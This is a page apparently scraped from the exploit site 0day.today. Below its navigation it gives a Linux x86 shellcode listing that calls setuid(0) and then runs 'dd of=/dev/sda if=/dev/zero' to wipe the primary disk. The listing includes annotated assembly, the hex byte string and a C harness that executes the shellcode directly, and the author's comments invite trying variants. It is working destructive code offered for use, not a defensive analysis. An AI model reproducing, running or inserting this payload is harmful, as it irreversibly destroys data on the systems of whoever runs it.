0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes
[======================================================================
linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes
======================================================================
/*
* Title : Linux x86 shellcode setuid(0) and dd of=/dev/sda if=/dev/zero, 74 bytes
* Author : xertux
* Platform: Linux X86 (7.04)
* Description : setuid(0) + dd of=/dev/sda if=/dev/zero
* Size : 74 bytes
* Decription : Use the dd command, we can change of and if argument to create, modify and destroy datas. Here the sda disk is format.
* */
/**
*BITS 32
*;Get root privileges
*xor eax, eax
*xor ebx, ebx
*xor ecx, ecx
*cdq
*mov al, 0x17
*int 0x80
*;exceve(dd of=/dev/sda if=/dev/zero)
*xor eax, eax ; eax become 0
*push eax ; null string termination
*push 0x64642f2f ; push //dd
*push 0x6e69622f ; push /bin
*mov ebx, esp ; put the address of "/bin//dd" into ebx
*push eax ; push null string termination
*push 0x6164732f ; push /sda
*push 0x2f766564 ; push dev/
*push 0x2f3d666f ; push of=/
*mov ecx, esp ; put the address of "of=/dev//sda" into ecx ==> you can change to another disk or any files
*push eax ; null string termination
*push 0x6f72657a ; push zero
*push 0x2f766564 ; push dev/
*push 0x2f3d6669 ; push if=/
*mov edx, esp ; put the address of "if=/dev/zero" into edx ==> you can try with /dev/random, it's funny ^^
*push eax ; push null args termination
*push edx ; push "if=/dev/zero"
*push ecx ; push "of=/dev//sda"
*push ebx ; push /bin//dd
*mov ecx, esp ; argument array completed via esp
*xor edx, edx
*mov al, 0x0b ; put the int execve call into al
*int 0x80 ; system call
*/
#include "stdio.h"
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x64\x64\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2f\x73\x64\x61"
"\x68\x64\x65\x76\x2f\x68\x6f\x66\x3d\x2f\x89\xe1\x50\x68\x7a\x65"
"\x72\x6f\x68\x64\x65\x76\x2f\x68\x69\x66\x3d\x2f\x89\xe2\x50\x52"
"\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";;
int main()
{
printf(" [*] Shellcode - length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
# 0day.today [2024-11-15] #